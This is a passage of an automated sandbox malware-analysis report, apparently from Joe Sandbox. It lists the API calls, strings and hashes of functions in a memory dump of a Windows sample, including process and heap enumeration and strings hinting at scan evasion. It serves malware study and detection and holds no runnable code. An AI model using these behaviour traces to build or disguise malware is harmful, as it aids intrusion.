                                                                                • Part of subcall function 02985A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02985B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02985B37
                                                                                • Part of subcall function 02985A78: RegQueryValueExA.ADVAPI32(?,02985CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02985B7D,?,80000001), ref: 02985B55
                                                                                • Part of subcall function 02985A78: RegCloseKey.ADVAPI32(?,02985B84,00000000,?,?,00000000,02985B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02985B77
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                              • String ID:
                                                                              • API String ID: 2796650324-0
                                                                              • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                              • Instruction ID: 2fd8d6da8630a9144d9adb226538a5efcd6cccab81c31ba52ddb8e6ccc76cbaf
                                                                              • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                              • Instruction Fuzzy Hash: B1E06D71A002148BCB10EE5888C0A5637D8AB08750F4A0565EC58DF34AD370DD148BD0
                                                                              Function 02987DA4 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02987DB8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                              • Instruction ID: b97dcf7e315749c58c63e9ecca67bfbc0375da287b1997dc7b1d0bec4cf8041a
                                                                              • Opcode Fuzzy Hash: 736f4f92db52b42fc2a1391f4de21fa5b41205fd5f72813ecabc44a8b4ec614d
                                                                              • Instruction Fuzzy Hash: E4D05B763082107AD220A55A6C84EFB9BDCCFC5770F144639F658C7180E7608C01C771
                                                                              Function 0299A194 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02999EF8: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0299A17F,?,?,0299A211,00000000,0299A2ED), ref: 02999F0C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999F24
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999F36
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999F48
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999F5A
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999F6C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999F7E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999F90
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999FA2
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999FB4
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999FC6
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999FD8
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999FEA
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999FFC
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0299A00E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0299A020
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0299A032
                                                                              • Process32First.KERNEL32(?,00000128), ref: 0299A1A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$FirstHandleModuleProcess32
                                                                              • String ID:
                                                                              • API String ID: 2774106396-0
                                                                              • Opcode ID: 496ab0227d67b3f8f2eb7e0cfeef1ba7644353cebb2788ff5cbddc549ed02bc8
                                                                              • Instruction ID: c989b2cc5a20cad747c310a838fd6a933388fea93ad46b982c2e385dcbb78506
                                                                              • Opcode Fuzzy Hash: 496ab0227d67b3f8f2eb7e0cfeef1ba7644353cebb2788ff5cbddc549ed02bc8
                                                                              • Instruction Fuzzy Hash: 90C08CB36426341BAE2066FC2FC88D3978DCD8B1BB30408A3F509D3142D3258C10AAA0
                                                                              Function 0299A1B4 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 02999EF8: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0299A17F,?,?,0299A211,00000000,0299A2ED), ref: 02999F0C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999F24
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999F36
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999F48
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999F5A
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999F6C
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999F7E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999F90
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999FA2
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999FB4
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999FC6
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999FD8
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999FEA
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999FFC
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0299A00E
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0299A020
                                                                                • Part of subcall function 02999EF8: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0299A032
                                                                              • Process32Next.KERNEL32(?,00000128), ref: 0299A1C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModuleNextProcess32
                                                                              • String ID:
                                                                              • API String ID: 2237597116-0
                                                                              • Opcode ID: 9e3f6e52fc7b7febf8a6bb0bb87ee47e3c560e41270f93bf8e155e8fa8a014de
                                                                              • Instruction ID: 0df12f92e3a4cdbfc7f520641c6b5e38b5bf807b21324d70d958aa19396d8fc9
                                                                              • Opcode Fuzzy Hash: 9e3f6e52fc7b7febf8a6bb0bb87ee47e3c560e41270f93bf8e155e8fa8a014de
                                                                              • Instruction Fuzzy Hash: DCC08073602524179F1066FC2EC44D3574DCD491B73040C63B519D3101D3154C10D590
                                                                              Function 02987E20 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,?,0299E793,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanString,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,UacInitialize), ref: 02987E2B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                              • Instruction ID: 596a4291452e0332eae7ee43ab46ea7c8e48f63c7ec4e99e2c3a2ae86eca1247
                                                                              • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                                                                              • Instruction Fuzzy Hash: B2C08CA62022020A1E60B5FC0CC409A42CC098413837C1F29A0B8DE2E3D32288222870
                                                                              Function 02987E44 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,?,029A1920,ScanString,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,ScanBuffer,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,Initialize), ref: 02987E4F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                              • Instruction ID: 2222901bbff392444782c6299c9d4dc8763a9fcf57482da0a571502800839dc5
                                                                              • Opcode Fuzzy Hash: f224b653ec22911d66b4e12bae26b762512d9a06ebf858662df5de79d6ddce78
                                                                              • Instruction Fuzzy Hash: 8EC08CA62022000E1E60F1FC4CC059A42CC098553837C2F21E0A9DA2E3D32288522810
                                                                              Function 02984C24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeString
                                                                              • String ID:
                                                                              • API String ID: 3341692771-0
                                                                              • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                              • Instruction ID: 1ec470d30e98d0caea14b9196eb568acb326d182cc8ace9c735c21974f851a2f
                                                                              • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                              • Instruction Fuzzy Hash: AFC012B260033547EB216A989CC079662CCDF452A5F1C10A1D508D7240E3609C004B65
                                                                              Function 02984C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
                                                                              • SysReAllocStringLen.OLEAUT32(029A9B3C,0299D680,000000B4), ref: 02984C62
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: String$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 344208780-0
                                                                              • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                              • Instruction ID: 2ad5c57609bfabdbc6b3abf92376b56f4dbe3dc0d2d4504af2e6605accce497e
                                                                              • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                              • Instruction Fuzzy Hash: 65D080745001035DAF2CBA554944AB777AE9DD020634CE65DD902CE240F721C801CA31
                                                                              Function 029A9858 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • timeSetEvent.WINMM(00002710,00000000,029A984C,00000000,00000001), ref: 029A9868
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Eventtime
                                                                              • String ID:
                                                                              • API String ID: 2982266575-0
                                                                              • Opcode ID: e8b63d50ecef12d9556c278b3f3bce2b8f2e7949782cf0a95caa7ff12e037266
                                                                              • Instruction ID: 9197b2ce9bb2879890cd21d888c7bc0e4093d5da0f4bba489d66a33abcf2eb8c
                                                                              • Opcode Fuzzy Hash: e8b63d50ecef12d9556c278b3f3bce2b8f2e7949782cf0a95caa7ff12e037266
                                                                              • Instruction Fuzzy Hash: 93C092F07953403EFA10B6A96CD2FB3699DEB84B00F100422B600EE2C3E5E248509E60
                                                                              Function 02984BE4 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02984BEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocString
                                                                              • String ID:
                                                                              • API String ID: 2525500382-0
                                                                              • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                              • Instruction ID: 7b93f826b1f4703741da9eaef866fd0c81bc7768ec3fb3a1a209e47e9e495387
                                                                              • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                              • Instruction Fuzzy Hash: E6B0123C64820358FB5033610D00F7A00CC0F902C7F8C20959E28C80C0FF00C4018833
                                                                              Function 02984BFC Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02984C03
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeString
                                                                              • String ID:
                                                                              • API String ID: 3341692771-0
                                                                              • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                              • Instruction ID: 80b04a7ab5ac186b2a27d509d96c5b063dd06cd5e42aa6498e0b15ce38233bc2
                                                                              • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                              • Instruction Fuzzy Hash: 47A022AC0003030ACF0B332E000002A20BF3FE03003CEC0E802008A0008F3A8000AE30
                                                                              Function 029815CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02981A03,?,02982000), ref: 029815E2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: e6d9ff02c8b863b45e5b6074b9c177880f6e408d3bed93eb027b5b321be6f2f7
                                                                              • Instruction ID: a340b22a850b2ad320312c6e12d173257ec624a41b1352de63ffdcbfb3dc9fa1
                                                                              • Opcode Fuzzy Hash: e6d9ff02c8b863b45e5b6074b9c177880f6e408d3bed93eb027b5b321be6f2f7
                                                                              • Instruction Fuzzy Hash: EFF049F0B463004FDB09DFB99A803117BE6E78A344F148579D609DB388E77184429F00
                                                                              Function 02981682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02982000), ref: 029816A4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: b14afdbafe8d72a55af21424f4dafff29b2d1ce769e23b7f39bfcbaadf2a4207
                                                                              • Instruction ID: 17ef8bfbdf19439b3c20df1d54780de6caf017666dc6bf584b5a0e5e48850a2f
                                                                              • Opcode Fuzzy Hash: b14afdbafe8d72a55af21424f4dafff29b2d1ce769e23b7f39bfcbaadf2a4207
                                                                              • Instruction Fuzzy Hash: B8F0B4B2B457996BD7109F5EAC80792BB98FB40314F054139F94CD7340D770A8518B94
                                                                              Function 029816E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02981704
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: bca122f2631e3993f14be9634c51fc80b08a124397e2eaa00034da1861fde48d
                                                                              • Instruction ID: 69b3abb09badf25878d96871f5c87caddbb192c878394ac80575d963e8fea21b
                                                                              • Opcode Fuzzy Hash: bca122f2631e3993f14be9634c51fc80b08a124397e2eaa00034da1861fde48d
                                                                              • Instruction Fuzzy Hash: 1DE0CD75300301AFD7106F7D5D407527BDCEF84654F1C4879F549DB241D260E8118B64

                                                                              Non-executed Functions

                                                                              Function 02999EF8 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0299A17F,?,?,0299A211,00000000,0299A2ED), ref: 02999F0C
                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02999F24
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02999F36
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02999F48
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02999F5A
                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02999F6C
                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02999F7E
                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02999F90
                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02999FA2
                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02999FB4
                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02999FC6
                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02999FD8
                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02999FEA
                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02999FFC
                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0299A00E
                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0299A020
                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0299A032
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                              • API String ID: 667068680-597814768
                                                                              • Opcode ID: 30a051de223c3fca1af3f684ceb5da9762363595ae4ee0c5b9e2797f1a5dc987
                                                                              • Instruction ID: d2231c72ebc83506ffff230abe71e8245e4f8b4fe5879e6df76cbc45999a2061
                                                                              • Opcode Fuzzy Hash: 30a051de223c3fca1af3f684ceb5da9762363595ae4ee0c5b9e2797f1a5dc987
                                                                              • Instruction Fuzzy Hash: AC3128B0E85350EFEF10EFF8D88AA6677ADEB8A710B040965A414CF244D679D890DF52
                                                                              Function 029858B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,02986BD8,02980000,029AB790), ref: 029858D1
                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029858E8
                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 02985918
                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 0298597C
                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859B2
                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859C5
                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859D7
                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000,029AB790), ref: 029859E3
                                                                              • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8,02980000), ref: 02985A17
                                                                              • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02986BD8), ref: 02985A23
                                                                              • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02985A45
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                              • String ID: GetLongPathNameA$\$kernel32.dll
                                                                              • API String ID: 3245196872-1565342463
                                                                              • Opcode ID: 2896edd83e4979fa46b169b4942cc27a277d6653109ee5c3ab657636e6d943b4
                                                                              • Instruction ID: 7084db0e54cabd6bb7f140dc1165b7df4254e2f5a0a219d1a5e3d8743d6749eb
                                                                              • Opcode Fuzzy Hash: 2896edd83e4979fa46b169b4942cc27a277d6653109ee5c3ab657636e6d943b4
                                                                              • Instruction Fuzzy Hash: 6B416D71D00259AFDF10EAE8CCC8AEEB3BDAB48350F4A45A5A158E7241E770DE49CF54
                                                                              Function 02985B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02985B94
                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02985BA1
                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02985BA7
                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02985BD2
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C19
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C29
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02985C51
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02985C61
                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02985C87
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02985C97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                              • API String ID: 1599918012-2375825460
                                                                              • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                                                                              • Instruction ID: 0f6741a223ba8fe6e5665b4d2b2a71df44d85da3974b0b3ec0578d74ecb410e2
                                                                              • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
